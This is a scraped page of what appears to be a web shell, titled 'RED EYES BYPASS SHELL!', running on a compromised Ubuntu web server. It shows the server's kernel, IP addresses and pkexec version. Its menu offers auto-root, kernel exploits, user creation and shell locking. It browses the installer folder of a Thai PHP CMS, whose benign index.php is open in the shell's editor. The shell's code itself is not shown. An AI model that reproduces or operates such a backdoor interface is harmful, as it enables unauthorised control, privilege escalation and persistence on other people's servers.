Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
commert /
accout /
install /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
img
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
complete.php
542
B
-rwxr-xr-x
database.sql
13.51
KB
-rwxr-xr-x
db.php
13.63
KB
-rwxr-xr-x
index.php
2.28
KB
-rwxr-xr-x
language.php
3.5
KB
-rwxr-xr-x
step0.php
3.83
KB
-rwxr-xr-x
step1.php
2.87
KB
-rwxr-xr-x
step2.php
2.16
KB
-rwxr-xr-x
step3.php
4.1
KB
-rwxr-xr-x
step4.php
9.48
KB
-rwxr-xr-x
style.css
1.03
KB
-rwxr-xr-x
upgrade0.php
2.85
KB
-rwxr-xr-x
upgrade1.php
1.78
KB
-rwxr-xr-x
upgrade2.php
25.66
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /* ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(-1); */ session_start(); // path define('ROOT_PATH', str_replace(array('\\', 'install/index.php'), array('/', ''), __FILE__)); // step $step = isset($_REQUEST['step']) ? (int) $_REQUEST['step'] : 0; // โหลดค่าติดตั้งปัจจุบัน $new_config = include ROOT_PATH.'install/settings/config.php'; // ไตเติล $title = 'การติดตั้ง › Setup Configuration File'; $h1 = 'การติดตั้ง เวอร์ชั่น '.$new_config['version']; // เนื้อหา $content = ''; if (is_file(ROOT_PATH.'settings/config.php') && is_array(include (ROOT_PATH.'settings/config.php')) && is_file(ROOT_PATH.'settings/database.php') && is_array(include (ROOT_PATH.'settings/database.php'))) { // โหลดค่าติดตั้งเก่า $config = include ROOT_PATH.'settings/config.php'; if (empty($config['version']) || version_compare($config['version'], $new_config['version']) == -1) { // อัปเกรด $title = 'การปรับรุ่น เวอร์ชั่น '.$new_config['version']; $h1 = 'การปรับรุ่น เวอร์ชั่น '.$new_config['version']; $file = ROOT_PATH.'install/upgrade'.$step.'.php'; } else { // ติดตั้งแล้ว $file = ROOT_PATH.'install/complete.php'; } } elseif (is_file(ROOT_PATH.'install/step'.$step.'.php')) { // ติดตั้ง $file = ROOT_PATH.'install/step'.$step.'.php'; } // header echo '<!DOCTYPE html>'; echo '<html lang=TH dir=ltr>'; echo '<head>'; echo '<meta charset=utf-8>'; echo '<title>'.$title.'</title>'; echo '<link rel=stylesheet href="../skin/gcss.css">'; echo '<link rel=stylesheet href="../skin/fonts.css">'; echo '<link rel=stylesheet href="./style.css">'; echo '</head>'; echo '<body>'; echo '<main>'; echo '<h1 id=logo>'.$h1.'</h1>'; // เนื้อหา include $file; // footer echo '<div class=footer><a href="https://www.kotchasan.com">Kotchasan</a> สงวนลิขสิทธิ์ ตามพระราชบัญญัติลิขสิทธิ์ พ.ศ. 2539</div>'; echo '</main>'; echo '</body>'; echo '</html>';
Close